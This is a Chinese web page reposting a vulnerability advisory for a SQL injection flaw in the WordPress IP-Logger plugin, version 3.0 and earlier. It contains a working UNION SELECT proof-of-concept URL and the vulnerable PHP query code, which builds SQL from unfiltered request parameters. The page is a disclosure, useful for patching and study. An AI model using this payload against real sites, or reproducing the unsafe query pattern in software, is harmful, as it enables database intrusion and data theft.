WordPress插件IP-Logger<= 3.0 SQL注射缺陷及修复

WordPress插件IP-Logger<= 3.0 SQL注射缺陷及修复 - 网

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] # Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)# 下载地址: http://downloads.wordpr......

# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# 下载地址: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# 测试版本: 3.0 (已测)

---
测试方法
---
http://www.2cto.com /wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1

---------------
缺陷代码
---------------
$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,Blocked,Ignored from $table_name
where Latitude=%s and Longitude=%s and Blocked = '%s'
order by stamp asc limit 50",
$_REQUEST["lat"],
$_REQUEST["lon"],
$_REQUEST["blocked"]);

$res = mysql_query($sql);

修复：
过滤

Ecmall全版本本地文件包含漏洞及修复(REQUEST内容缺

Mass username brute force attacks - 网站安全 - 自学php

子栏目

WordPress插件IP-Logger<= 3.0 SQL注射缺陷及修复 - 网

最新评论

添加评论

更多文章推荐

添加评论